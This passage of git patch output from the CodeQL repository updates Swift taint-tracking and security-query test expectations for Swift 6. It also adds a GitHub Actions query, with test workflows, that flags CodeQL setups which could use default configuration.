call to sourceString() | conversions.swift:158:12:158:12 | v3 | result | -| conversions.swift:166:12:166:35 | call to Self.init(_:) | conversions.swift:166:24:166:34 | call to sourceInt() | conversions.swift:166:12:166:35 | call to Self.init(_:) | result | | conversions.swift:173:13:173:13 | arr1 | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | result | | conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:174:13:174:13 | arr2 | result | | conversions.swift:175:13:175:19 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | result | @@ -643,12 +572,10 @@ subpaths | conversions.swift:189:13:189:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:189:13:189:20 | ...[...] | result | | conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:190:13:190:20 | ...[...] | result | | conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:206:13:206:13 | withUInt | result | -| conversions.swift:208:12:208:12 | self | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:208:12:208:12 | self | result | | conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:212:13:212:25 | .v | result | | conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:218:13:218:26 | .v | result | | conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:221:12:221:12 | self | result | | conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:225:13:225:25 | .v | result | -| conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | result | | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | result | | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | result | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 48de9172b36..2a6b89d244c 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected @@ -1,2 +1,17 @@ -failures testFailures +| conversions.swift:33:30:34:1 | // $ tainted=33\n | Missing result: tainted=33 | +| conversions.swift:34:32:35:1 | // $ tainted=34\n | Missing result: tainted=34 | +| conversions.swift:58:16:59:1 | // $ tainted=57\n | Missing result: tainted=57 | +| conversions.swift:61:16:62:1 | // $ tainted=60\n | Missing result: tainted=60 | +| conversions.swift:69:42:70:1 | // $ tainted=69\n | Missing result: tainted=69 | +| conversions.swift:71:40:72:1 | // $ tainted=71\n | Missing result: tainted=71 | +| conversions.swift:72:43:73:1 | // $ tainted=72\n | Missing result: tainted=72 | +| conversions.swift:73:40:74:1 | // $ tainted=73\n | Missing result: tainted=73 | +| conversions.swift:74:50:75:1 | // $ tainted=74\n | Missing result: tainted=74 | +| conversions.swift:110:34:111:1 | // $ tainted=110\n | Missing result: tainted=110 | +| conversions.swift:130:38:131:1 | // $ tainted=130\n | Missing result: tainted=130 | +| conversions.swift:131:40:132:1 | // $ tainted=131\n | Missing result: tainted=131 | +| conversions.swift:166:38:167:1 | // $ tainted=166\n | Missing result: tainted=166 | +| conversions.swift:208:18:209:1 | // $ tainted=232\n | Missing result: tainted=232 | +| conversions.swift:232:41:233:1 | // $ tainted=232\n | Missing result: tainted=232 | +failures diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index 48de9172b36..b321acf94e3 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,2 +1,13 @@ -failures testFailures +| optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | +| optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | +| string.swift:237:35:238:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:244:33:245:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:270:40:271:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:271:40:272:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:272:42:273:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:586:19:587:1 | // $ tainted=565\n | Missing result: tainted=565 | +| string.swift:587:27:588:1 | // $ tainted=565\n | Missing result: tainted=565 | +| string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | +| string.swift:605:30:606:1 | // $ tainted=605\n | Missing result: tainted=605 | +failures diff --git a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected index 8aa6c1b2d02..a52075ab00e 100644 --- a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected +++ b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected @@ -1,4 +1,4 @@ -| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getCanonicalType:Int, getFullName:Int, getName:Int, getUnderlyingType:Int | +| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:BitwiseCopyable, getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getCanonicalType:Int, getFullName:Int, getName:Int, getUnderlyingType:Int | | nominaltype.swift:85:6:85:6 | j | Any? | getCanonicalType:Optional, getFullName:Any?, getName:Any?, getUnderlyingType:Any? | | nominaltype.swift:86:6:86:6 | a | A | getCanonicalType:A, getFullName:A, getName:A, getUnderlyingType:A | | nominaltype.swift:87:6:87:6 | a_alias | A_alias | getAliasedType:A, getCanonicalType:A, getFullName:A_alias, getName:A_alias, getUnderlyingType:A | diff --git a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected index e4bdf96ab7f..d9c0b1a0994 100644 --- a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected +++ b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected @@ -1,4 +1,4 @@ -| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getABaseTypeDecl:CVarArg, getABaseTypeDecl:CodingKeyRepresentable, getABaseTypeDecl:CustomReflectable, getABaseTypeDecl:Decodable, getABaseTypeDecl:Encodable, getABaseTypeDecl:Equatable, getABaseTypeDecl:FixedWidthInteger, getABaseTypeDecl:Hashable, getABaseTypeDecl:MirrorPath, getABaseTypeDecl:SIMDScalar, getABaseTypeDecl:Sendable, getABaseTypeDecl:SignedInteger, getABaseTypeDecl:_CustomPlaygroundQuickLookable, getABaseTypeDecl:_ExpressibleByBuiltinIntegerLiteral, getABaseTypeDecl:_HasCustomAnyHashableRepresentation, getFullName:Int, getName:Int | +| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:BitwiseCopyable, getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getABaseTypeDecl:BitwiseCopyable, getABaseTypeDecl:CVarArg, getABaseTypeDecl:CodingKeyRepresentable, getABaseTypeDecl:CustomReflectable, getABaseTypeDecl:Decodable, getABaseTypeDecl:Encodable, getABaseTypeDecl:Equatable, getABaseTypeDecl:FixedWidthInteger, getABaseTypeDecl:Hashable, getABaseTypeDecl:MirrorPath, getABaseTypeDecl:SIMDScalar, getABaseTypeDecl:Sendable, getABaseTypeDecl:SignedInteger, getABaseTypeDecl:_CustomPlaygroundQuickLookable, getABaseTypeDecl:_ExpressibleByBuiltinIntegerLiteral, getABaseTypeDecl:_HasCustomAnyHashableRepresentation, getFullName:Int, getName:Int | | nominaltype.swift:86:6:86:6 | a | A | getFullName:A, getName:A | | nominaltype.swift:87:6:87:6 | a_alias | A_alias | getAliasedType:A, getFullName:A_alias, getName:A_alias | | nominaltype.swift:88:6:88:6 | a_optional_alias | A_optional_alias | getAliasedType:A?, getFullName:A_optional_alias, getName:A_optional_alias | diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected index 553d53846e6..38c675f7199 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected +++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected @@ -46,9 +46,6 @@ | UnanchoredUrlRegex.swift:71:46:71:46 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:78:39:78:39 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:79:39:79:39 | https?://good.com:8080 | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:82:3:82:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:83:3:83:3 | https?:\\/\\/good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:84:3:84:3 | ^https?://good.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | | UnanchoredUrlRegex.swift:95:39:95:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:101:39:101:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | test.swift:56:16:56:16 | ^http://example.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | diff --git a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected index 48de9172b36..213ece4f9ad 100644 --- a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected +++ b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected @@ -1,2 +1,18 @@ -failures testFailures +| testLibxmlXXE.swift:101:78:102:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:102:80:103:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:103:107:104:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:104:82:105:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:106:78:107:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:107:80:108:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:109:87:110:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:110:89:111:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:112:99:113:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:113:97:114:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:115:87:116:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:116:89:117:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:118:89:119:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:119:91:120:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:121:98:122:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:122:100:123:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +failures From 0b7de6e86aa32a07856e0992c005658497e85f28 Mon Sep 17 00:00:00 2001 From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Thu, 31 Oct 2024 15:28:55 +0000 Subject: [PATCH 0673/1267] add rule to detect if default setup would be more appropriate --- ...efaultableCodeQLInitiatlizeActionQuery.qll | 36 ++++++++++ .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 15 ++++ .../workflows/defaultable_workflow.yml | 70 +++++++++++++++++++ .../should_be_using_advanced_setup.yml | 41 +++++++++++ .../UnnecessaryUseOfAdvancedConfig.actual | 1 + .../UnnecessaryUseOfAdvancedConfig.expected | 1 + .../UnnecessaryUseOfAdvancedConfig.qlref | 1 + 7 files changed, 165 insertions(+) create mode 100644 ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref diff --git a/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll new file mode 100644 index 00000000000..ddec858aa62 --- /dev/null +++ b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll @@ -0,0 +1,36 @@ +private import actions + +/** + * Holds if workflow step uses the github/codeql-action/init action with no customizations. + * e.g. + * - name: Initialize + * uses: github/codeql-action/init@v2 + * with: + * languages: ruby, javascript + * + */ + +class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { + DefaultableCodeQLInitiatlizeActionQuery() { + this.getCallee() = "github/codeql-action/init" and + not customizedWorkflowStep(this) + } +} + +/** + * Holds if the with: part of the workflow step contains any arguments for with: other than "languages". + * e.g. + * - name: Initialize CodeQL + * uses: github/codeql-action/init@v3 + * with: + * languages: ${{ matrix.language }} + * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + * + */ + +predicate customizedWorkflowStep(UsesStep codeQLInitStep) { + exists(string arg | + exists(codeQLInitStep.getArgument(arg)) and + arg != "languages" + ) +} \ No newline at end of file diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql new file mode 100644 index 00000000000..c2259473b9c --- /dev/null +++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql @@ -0,0 +1,15 @@ +/** + * @name Workflow Should Use Default Setup + * @description Workflows should use CodeQL Action with default setup instead of advanced configuration if there are no customizations + * @kind problem + * @problem.severity recommendation + * @precision high + * @id actions/unnecessary-use-of-advanced-config + * @tags actions + * maintainability + */ + +import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery + +from DefaultableCodeQLInitiatlizeActionQuery action +select action, "CodeQL Action could use default setup instead of advanced configuration." \ No newline at end of file diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml new file mode 100644 index 00000000000..31f43d8b8b2 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -0,0 +1,70 @@ +# For most projects, this workflow file will not need changing; you simply need +# to commit it to your repository. +# +# You may wish to alter this file to override the set of languages analyzed, +# or to provide custom queries or build logic. +# +# ******** NOTE ******** +# We have attempted to detect the languages in your repository. Please check +# the `language` matrix defined below to confirm you have the correct set of +# supported CodeQL languages. +# +name: 'CodeQL' + +on: + push: + branches: [main] + pull_request: + # The branches below must be a subset of the branches above + branches: [main] + schedule: + - cron: '16 2 * * 5' + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ['javascript'] + # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] + # Learn more about CodeQL language support at https://git.io/codeql-language-support + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + # If you wish to specify custom queries, you can do so here or in a config file. + # By default, queries listed here will override any specified in a config file. + # Prefix the list here with "+" to use these queries and those in the config file. + # queries: ./path/to/local/query, your-org/your-repo/queries@main + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@v3 + + # â„¹ï¸ Command-line programs to run using the OS shell. + # 📚 https://git.io/JvXDl + + # âœï¸ If the Autobuild fails above, remove it and uncomment the following three lines + # and modify them (or add more) to build your code if your project + # uses a compiled language + + #- run: | + # make bootstrap + # make release + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml new file mode 100644 index 00000000000..e736d567773 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml @@ -0,0 +1,41 @@ +name: 'CodeQL' + +on: + push: + branches: ['master'] + pull_request: + branches: ['master'] + +permissions: + actions: read + contents: read + packages: read + security-events: write + +jobs: + analyze: + name: Analyze + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + include: + - language: javascript + os: ubuntu-22.04 + - language: ruby + os: ubuntu-22.04-16core + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 + with: + category: codeql/${{ matrix.language }}/full diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual new file mode 100644 index 00000000000..3c8904a86af --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual @@ -0,0 +1 @@ +| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected new file mode 100644 index 00000000000..3c8904a86af --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected @@ -0,0 +1 @@ +| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref new file mode 100644 index 00000000000..75a8fe2398a --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -0,0 +1 @@ +Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file From 6f0f73974ac4cd8b2487a72530c07f2817b4a8fe Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 14:43:53 +0000 Subject: [PATCH 0674/1267] Swift: Update dropFirst / dropLast / reversed models for Swift 6. --- .../codeql/swift/frameworks/StandardLibrary/Collection.qll | 6 ++++++ .../dataflow/taint/libraries/TaintInline.expected | 2 -- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index a8cf7b1dcd1..26512f61736 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll @@ -21,7 +21,9 @@ private class CollectionSummaries extends SummaryModelCsv { ";Collection;true;suffix(_:);;;Argument[-1];ReturnValue;taint", ";Collection;true;suffix(from:);;;Argument[-1];ReturnValue;taint", ";Collection;true;dropFirst(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;dropFirst(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;split(maxSplits:omittingEmptySubsequences:whereSeparator:);;;Argument[-1];ReturnValue;taint", ";Collection;true;split(separator:maxSplits:omittingEmptySubsequences:);;;Argument[-1];ReturnValue;taint", ";Collection;true;removeFirst();;;Argument[-1];ReturnValue;taint", @@ -38,9 +40,13 @@ private class CollectionSummaries extends SummaryModelCsv { ";RangeReplaceableCollection;true;insert(_:at:);;;Argument[0];Argument[-1];taint", ";RangeReplaceableCollection;true;replaceSubrange(_:with:);;;Argument[1];Argument[-1];taint", ";RangeReplaceableCollection;true;replaceSubrange(_:with:);;;Argument[1].CollectionElement;Argument[-1].CollectionElement;value", + ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint", + ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";BidirectionalCollection;true;joined(separator:);;;Argument[-1..0];ReturnValue;taint", ";BidirectionalCollection;true;last(where:);;;Argument[-1];ReturnValue;taint", ";BidirectionalCollection;true;popLast();;;Argument[-1];ReturnValue;taint", + ";BidirectionalCollection;true;reversed();;;Argument[-1];ReturnValue;taint", + ";BidirectionalCollection;true;reversed();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint", ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value", ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[0].Parameter[0].CollectionElement;Argument[-1].CollectionElement;value", diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index b321acf94e3..d7ab587c67a 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,8 +1,6 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:237:35:238:1 | // $ tainted=217\n | Missing result: tainted=217 | -| string.swift:244:33:245:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:270:40:271:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:271:40:272:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:272:42:273:1 | // $ tainted=217\n | Missing result: tainted=217 | From be1264983806f98609e37ca8c6dfab21dc385619 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 15:29:25 +0000 Subject: [PATCH 0675/1267] Swift: Update joined models for Swift 6. --- .../lib/codeql/swift/frameworks/StandardLibrary/Collection.qll | 2 ++ .../lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll | 1 + .../dataflow/taint/libraries/TaintInline.expected | 3 --- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index 26512f61736..6a5b1bdb777 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll @@ -43,6 +43,8 @@ private class CollectionSummaries extends SummaryModelCsv { ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint", ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";BidirectionalCollection;true;joined(separator:);;;Argument[-1..0];ReturnValue;taint", + ";BidirectionalCollection;true;joined(separator:);;;Argument[-1].CollectionElement;ReturnValue;taint", + ";BidirectionalCollection;true;joined(separator:);;;Argument[-1].CollectionElement.CollectionElement;ReturnValue.CollectionElement;value", ";BidirectionalCollection;true;last(where:);;;Argument[-1];ReturnValue;taint", ";BidirectionalCollection;true;popLast();;;Argument[-1];ReturnValue;taint", ";BidirectionalCollection;true;reversed();;;Argument[-1];ReturnValue;taint", diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll index 1c7774bc264..efe8d785222 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll @@ -45,6 +45,7 @@ private class SequenceSummaries extends SummaryModelCsv { ";Sequence;true;joined();;;Argument[-1].CollectionElement.CollectionElement;ReturnValue.CollectionElement;value", ";Sequence;true;joined(separator:);;;Argument[0..-1];ReturnValue;taint", ";Sequence;true;joined(separator:);;;Argument[-1].CollectionElement;ReturnValue;taint", + ";Sequence;true;joined(separator:);;;Argument[-1].CollectionElement.CollectionElement;ReturnValue.CollectionElement;value", ";Sequence;true;first(where:);;;Argument[-1].CollectionElement;ReturnValue;value", ";Sequence;true;withContiguousStorageIfAvailable(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint", ";Sequence;true;withContiguousStorageIfAvailable(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value", diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index d7ab587c67a..0953cc40f2b 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,9 +1,6 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:270:40:271:1 | // $ tainted=217\n | Missing result: tainted=217 | -| string.swift:271:40:272:1 | // $ tainted=217\n | Missing result: tainted=217 | -| string.swift:272:42:273:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:586:19:587:1 | // $ tainted=565\n | Missing result: 